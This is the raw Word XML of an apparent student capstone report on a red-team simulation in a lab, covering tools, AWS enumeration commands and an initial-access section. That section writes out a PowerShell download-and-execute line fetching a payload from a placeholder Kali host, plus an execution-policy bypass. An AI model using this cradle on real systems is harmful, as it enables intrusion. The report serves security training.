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1.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/image9.png" ContentType="image/png"/>
  <Override PartName="/word/media/image18.png" ContentType="image/png"/>
  <Override PartName="/word/media/image20.png" ContentType="image/png"/>
  <Override PartName="/word/media/image8.png" ContentType="image/png"/>
  <Override PartName="/word/media/image17.png" ContentType="image/png"/>
  <Override PartName="/word/media/image12.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/image21.png" ContentType="image/png"/>
  <Override PartName="/word/media/image19.png" ContentType="image/png"/>
  <Override PartName="/word/media/image2.png" ContentType="image/png"/>
  <Override PartName="/word/media/image3.png" ContentType="image/png"/>
  <Override PartName="/word/media/image5.png" ContentType="image/png"/>
  <Override PartName="/word/media/image14.png" ContentType="image/png"/>
  <Override PartName="/word/media/image13.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/image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left"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Capstone Project Report: Full Adversary Simulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MITRE Caldera</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pacu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AWS CLI</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1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This capstone project simulated a full red team campaign against a controlled lab environment. The assessment covered reconnaissance, cloud enumeration, initial access, command and control simulation, credential access attempts, defense evasion, and blue team detection analysis using Wazuh.</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2. Lab Environmen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8640" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="0"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rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Attacker machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows 11 VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Victim system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Wazuh Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Blue team monitoring and detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AWS Lab Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cloud attack simulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:left="0"/>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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>3. Reconnaissance and Cloud Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cloud reconnaissance activities were performed using Pacu and AWS CLI utilities. The IAM enumeration module confirmed over 15,000 permissions assigned to the cloudlab-user account, indicating excessive privilege allocation within the AWS environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Commands Executed:</w:t>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Heading3"/>
              <w:numPr>
                <w:ilvl w:val="2"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="320" w:after="80"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Whoami</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Aws sts get-caller-identity</w:t>
              <w:br/>
              <w:t xml:space="preserve">           ws s3api list-buckets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The assessment identified that the cloudlab-user account possessed a very broad permission set. S3 enumeration was successful, but no buckets were present in the lab environment. The activity demonstrated valid credential usage and cloud infrastructure discovery capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Screenshot Placement:</w:t>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731510" cy="2820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34">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-34290</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>384175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="28206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28206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36">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>104140</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>428625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="28206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37">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>138430</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>452755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="28206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drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="38">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>358775</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="28206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2820670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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31510" cy="282067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31510" cy="2820670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4. Initial Access and Payload Delivery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Initial access simulation was performed using MITRE Caldera and PowerShell payload delivery. The payload was hosted on a Kali Linux HTTP server and executed remotely on the Windows victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Command executed:         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>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Heading3"/>
              <w:spacing w:before="320" w:after="80"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://KALI-IP/payload.ps1')"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Actions Performed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Started a Python HTTP server on Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Executed payload delivery through Caldera.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Downloaded PowerShell payload to the Windows victim.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Executed payload using execution policy bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Generated telemetry in Wazuh.</w:t>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0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-147320</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>201295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="282067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1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>52070</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>259715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="282067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2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-17145</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>289560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="282067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3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>367030</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>158750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4565015" cy="313944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2"/>
                    <a:srcRect l="9990" t="34966" r="9990" b="9990"/>
                    <a:stretch>
                      <a:fillRect/>
